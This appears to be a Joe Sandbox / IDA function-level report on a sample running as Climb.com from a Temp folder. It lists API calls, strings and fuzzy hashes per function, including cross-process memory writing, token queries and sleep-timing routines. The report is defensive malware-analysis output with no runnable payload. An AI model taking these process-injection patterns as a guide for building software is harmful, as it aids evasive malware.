CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?,?,?,004E0C4E), ref: 004E091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?,?), ref: 004E0936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?,?), ref: 004E0944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?), ref: 004E0954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?,?), ref: 004E0960

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: b2257ed83c174a8b05b0e90aa7c379b3993b3b70ae28dc32f8d2eff5a40e9460
Instruction ID: 1491de5555309838ae3ded525150184e19732aeacfee93646e0182876d62cbc1
Opcode Fuzzy Hash: b2257ed83c174a8b05b0e90aa7c379b3993b3b70ae28dc32f8d2eff5a40e9460
Instruction Fuzzy Hash: D7018FB2600214BFEB104F56DC44BAA7BBDEB44752F144525F905E2212D7B9DD80ABB0

Function 004EF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 004EF2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 004EF2BC
Sleep.KERNEL32(00000000), ref: 004EF2C4
QueryPerformanceCounter.KERNEL32(?), ref: 004EF2CE
Sleep.KERNEL32 ref: 004EF30A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 158a13757b4215e41354fc39826ffa1be417fcc7c6ec593243e87af8d81f209d
Instruction ID: c0dd1b4a92449421aeb941455756c7249d5b9a3eaab0d000391c1cd36798e9cb
Opcode Fuzzy Hash: 158a13757b4215e41354fc39826ffa1be417fcc7c6ec593243e87af8d81f209d
Instruction Fuzzy Hash: B4016D75C01519EBCF00AFB5E949AEEBB79FB18702F004466D901B2250DB389558D7A9

Function 004E1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004E1A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004E1A99

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 9d36e38ec05afef341690659d548b118fa905adee855a5a3d6c009820543166a
Instruction ID: 38c64837556faf92cadf80ae7ab59460f3e5b1f09ac3fa3a7841d05d736ace6d
Opcode Fuzzy Hash: 9d36e38ec05afef341690659d548b118fa905adee855a5a3d6c009820543166a
Instruction Fuzzy Hash: 29018CB9641215BFDB115FA5DC48EAB3B7EEF883A5B214426F845C3360DA35DC40DA70

Function 004E1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004E1976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004E1982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004E1991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004E1998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004E19AE

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d08b5bbb71f75088f8ff2b6e397f637ca331a1c56cbfd0bb6b031b36cc74b0fd
Instruction ID: 05b7078bdad278d6ff2e0248f0af037294f2916453a5b436c119880d92df6ce1
Opcode Fuzzy Hash: d08b5bbb71f75088f8ff2b6e397f637ca331a1c56cbfd0bb6b031b36cc74b0fd
Instruction Fuzzy Hash: 1AF0AF75140311BBD7211F65EC58F973B7DEF893A1F114411F905C7261DA35D800DA70

Function 004E1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004E1916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004E1922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004E1931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004E1938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004E194E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 801c18241e3fac856718cfabc130da1578db4b7c32ded85f9cb63d99f2983e32
Instruction ID: 4be38c51c6e47983d044faf7ae4f62563efcf1474e18cd2b672183f8bb329b77
Opcode Fuzzy Hash: 801c18241e3fac856718cfabc130da1578db4b7c32ded85f9cb63d99f2983e32
Instruction Fuzzy Hash: 0FF08C75140301BBDB211F669C4DF973B79EF893A1F114411FA0597261DA35D800DA70

Function 004F0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,004F0B24,?,004F3D41,?,00000001,004C3AF4,?), ref: 004F0CCB
CloseHandle.KERNEL32(?,?,?,?,004F0B24,?,004F3D41,?,00000001,004C3AF4,?), ref: 004F0CD8
CloseHandle.KERNEL32(?,?,?,?,004F0B24,?,004F3D41,?,00000001,004C3AF4,?), ref: 004F0CE5
CloseHandle.KERNEL32(?,?,?,?,004F0B24,?,004F3D41,?,00000001,004C3AF4,?), ref: 004F0CF2
CloseHandle.KERNEL32(?,?,?,?,004F0B24,?,004F3D41,?,00000001,004C3AF4,?), ref: 004F0CFF
CloseHandle.KERNEL32(?,?,?,?,004F0B24,?,004F3D41,?,00000001,004C3AF4,?), ref: 004F0D0C

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fd624562e493a7f51a9bac8a455d966d18fc73bce37cc1c527a4d12d400eaa4e
Instruction ID: 176dfbfa638507b26de8737ae9ccd68bd0f58816ef85b0a612562d1efea5040f
Opcode Fuzzy Hash: fd624562e493a7f51a9bac8a455d966d18fc73bce37cc1c527a4d12d400eaa4e
Instruction Fuzzy Hash: BA01D371801B598FC7309F66D880823F6F5BE902153118A3FD19252A22C770A944DE80

Function 004E65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 004E65BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 004E65D6
MessageBeep.USER32(00000000), ref: 004E65EE
KillTimer.USER32(?,0000040A), ref: 004E660A
EndDialog.USER32(?,00000001), ref: 004E6624

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 51c213257f9b71a67adacdde324acbb583ef758c40c7ec52a60cc15fcdbebbb9
Instruction ID: 3fb1c03d26eccaedd9d9d447b3dcb5f322ca419e42d47141bbb2aae08ad94f8d
Opcode Fuzzy Hash: 51c213257f9b71a67adacdde324acbb583ef758c40c7ec52a60cc15fcdbebbb9
Instruction Fuzzy Hash: 65018630500304ABEB216F21DD4EBD67B78FB20746F01465EA187610E1DBF8AA489B59

Function 004BDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004BDAD2

Part of subcall function 004B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,004BDB51,00551DC4,00000000,00551DC4,00000000,?,004BDB78,00551DC4,00000007,00551DC4,?,004BDF75,00551DC4), ref: 004B2D4E
Part of subcall function 004B2D38: GetLastError.KERNEL32(00551DC4,?,004BDB51,00551DC4,00000000,00551DC4,00000000,?,004BDB78,00551DC4,00000007,00551DC4,?,004BDF75,00551DC4,00551DC4), ref: 004B2D60

_free.LIBCMT ref: 004BDAE4
_free.LIBCMT ref: 004BDAF6
_free.LIBCMT ref: 004BDB08
_free.LIBCMT ref: 004BDB1A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 248f92c2e07fbc9bb9fec38d80d8bf3a18b36149c5d35864742f4b6ee44a3eef
Instruction ID: fd3cff50a972512948c6f30f47e2a4f65905ff34c9c325bb180292ef3ef2ef34
Opcode Fuzzy Hash: 248f92c2e07fbc9bb9fec38d80d8bf3a18b36149c5d35864742f4b6ee44a3eef
Instruction Fuzzy Hash: 2CF01232A48204AB8A24EB69E981CDB77EDEE157147A50C4FF009D7601DB7CFC80967C

Function 004B2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004B262E

Part of subcall function 004B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,004BDB51,00551DC4,00000000,00551DC4,00000000,?,004BDB78,00551DC4,00000007,00551DC4,?,004BDF75,00551DC4), ref: 004B2D4E
Part of subcall function 004B2D38: GetLastError.KERNEL32(00551DC4,?,004BDB51,00551DC4,00000000,00551DC4,00000000,?,004BDB78,00551DC4,00000007,00551DC4,?,004BDF75,00551DC4,00551DC4), ref: 004B2D60

_free.LIBCMT ref: 004B2640
_free.LIBCMT ref: 004B2653
_free.LIBCMT ref: 004B2664
_free.LIBCMT ref: 004B2675

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 036c1b1924e7564155f4c5e26b5316b0c79d4558363bf6311e49ce7e2ff588ed
Instruction ID: 666999ecb134f1f71e2986b6dd59c112aa75da21180ae2dc1cb5663b1d257d3a
Opcode Fuzzy Hash: 036c1b1924e7564155f4c5e26b5316b0c79d4558363bf6311e49ce7e2ff588ed
Instruction Fuzzy Hash: 02F030796017108B8701AF55ED119DA3B68BF3575A7010A0BF414D2274C7780905BFBD

Function 004B12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 004B1469
__freea.LIBCMT ref: 004B1487

Part of subcall function 004B18A7: _free.LIBCMT ref: 004B18BF

Strings

a/p, xrefs: 004B154E
am/pm, xrefs: 004B14EA

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 386aa73f60b5c07a5ac0c9df4b6f0dcadbfb96cf5203ff8543d574f1a798fd5a
Instruction ID: f909de1d4ef917d7d56caaa51028f15df6ca7a50fc20c45e8f2bf96e0b9ac0e8
Opcode Fuzzy Hash: 386aa73f60b5c07a5ac0c9df4b6f0dcadbfb96cf5203ff8543d574f1a798fd5a
Instruction Fuzzy Hash: E7D1EF719102069BDB248FA8C8A57FBB7B1EF15300FA8415BE9029B370D63D9D41CBB9

Function 00505231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

Part of subcall function 004F41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,005052EE,?,?,00000035,?), ref: 004F4229
Part of subcall function 004F41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,005052EE,?,?,00000035,?), ref: 004F4239

GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00505419
VariantInit.OLEAUT32(?), ref: 0050550E
VariantClear.OLEAUT32(?), ref: 005055CD

Strings

bnN, xrefs: 005054ED, 005055E4

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorLastVariant$ClearFormatInitMessage
String ID: bnN
API String ID: 2854431205-3725126882
Opcode ID: 41196b97c03800d80be4232425a57fbd9579bc2f87f33daadd9b320df6b0a2b5
Instruction ID: 6bb07f73f55743d1debb04801b99ea1fc75ecb75fecb6999a04c39743340252b
Opcode Fuzzy Hash: 41196b97c03800d80be4232425a57fbd9579bc2f87f33daadd9b320df6b0a2b5
Instruction Fuzzy Hash: F3D17270900249DFCB04EF96C491AEEBBB4FF14318F54851EE416AB292EB75E986CF50

Function 0048CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0048D253

Strings

t5U, xrefs: 0048D23A
t5U, xrefs: 0048CFC8
t5U, xrefs: 0048CFCF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5U$t5U$t5U
API String ID: 1385522511-2544110785
Opcode ID: 58dfc73c0fb84de5c28d5c1e2bb6d99f582002a374f5c4f88d9d7ad6123ecb94
Instruction ID: af3048a578787779eeabd58b7c7012e08981aba88eb444c61839775317ee0ffa
Opcode Fuzzy Hash: 58dfc73c0fb84de5c28d5c1e2bb6d99f582002a374f5c4f88d9d7ad6123ecb94
Instruction Fuzzy Hash: DE916975E01206CFCB14DF58C4906AEBBF1FF59304F24895AD945AB380E739AA82CB94

Function 005061A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 0050623D
_wcslen.LIBCMT ref: 00506249

Strings

CALLARGARRAY, xrefs: 00506243, 00506248
bnN, xrefs: 005061B1, 005062E1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY$bnN
API String ID: 157775604-3065644652
Opcode ID: 9932ae0d21e4981a9f71a7f286dfbf1882b5e5ddfe32f02d031a99e273c51133
Instruction ID: f90d918282a4d82b7455a9de5f7ace6a538e93a19c446668e62318fe9f076b7d
Opcode Fuzzy Hash: 9932ae0d21e4981a9f71a7f286dfbf1882b5e5ddfe32f02d031a99e273c51133
Instruction Fuzzy Hash: 0F41AE75A0021A9FCB00EFA9C8859EEBBF5FF58368F10406EE405A7291E7749D91CB90

Function 004E3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004EBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004E2B1D,?,?,00000034,00000800,?,00000034), ref: 004EBDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004E30AD

Part of subcall function 004EBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004E2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 004EBDBF

Part of subcall function 004EBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 004EBD1C
Part of subcall function 004EBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004E2AE1,00000034,?,?,00001004,00000000,00000000), ref: 004EBD2C
Part of subcall function 004EBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004E2AE1,00000034,?,?,00001004,00000000,00000000), ref: 004EBD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004E311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004E3167

Strings

@, xrefs: 004E317F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 420d490ac9753c728b5dc2418d401e89c7da67c765ca16b30fae5cab3c36824c
Instruction ID: 0dc9e5c5e34b5502b32a2a1c35260493ac0892a13e06f4dfeb0ea39e00349717
Opcode Fuzzy Hash: 420d490ac9753c728b5dc2418d401e89c7da67c765ca16b30fae5cab3c36824c
Instruction Fuzzy Hash: C4414C72900258AEDB11DFA5CC45EEEB7B8EF45705F00409AF945B7180DB746F84CBA4

Function 004B1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\768400\Climb.com,00000104), ref: 004B1AD9
_free.LIBCMT ref: 004B1BA4
_free.LIBCMT ref: 004B1BAE

Strings

C:\Users\user\AppData\Local\Temp\768400\Climb.com, xrefs: 004B1AD0, 004B1AD7, 004B1B06, 004B1B3E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\768400\Climb.com
API String ID: 2506810119-1800092792
Opcode ID: 925aaa3f83877b4c11ed65f7103151e102934555d97b95246ad0d7961379f695
Instruction ID: 45ef087f132e5d11570e6b402c866f7a0ff3f708e3a5bd540ccfac0e5d704dbb
Opcode Fuzzy Hash: 925aaa3f83877b4c11ed65f7103151e102934555d97b95246ad0d7961379f695
Instruction Fuzzy Hash: 6631B175A04208ABCB21DF99CC91CDFBBFCEB95310F5040ABE80497220E6785E45DBA9

Function 004ECB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004ECBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 004ECBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005529C0,015AFB88), ref: 004ECC40

Strings

0, xrefs: 004ECB8A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: c66462758e294893895bedbe005fb34ad78e80f0600dad6502fc2324ea92181a
Instruction ID: 1f39abc1ecc2ec7d70b3a64a991ea48aa5152a40cedb5e3a5859455374444bf9
Opcode Fuzzy Hash: c66462758e294893895bedbe005fb34ad78e80f0600dad6502fc2324ea92181a
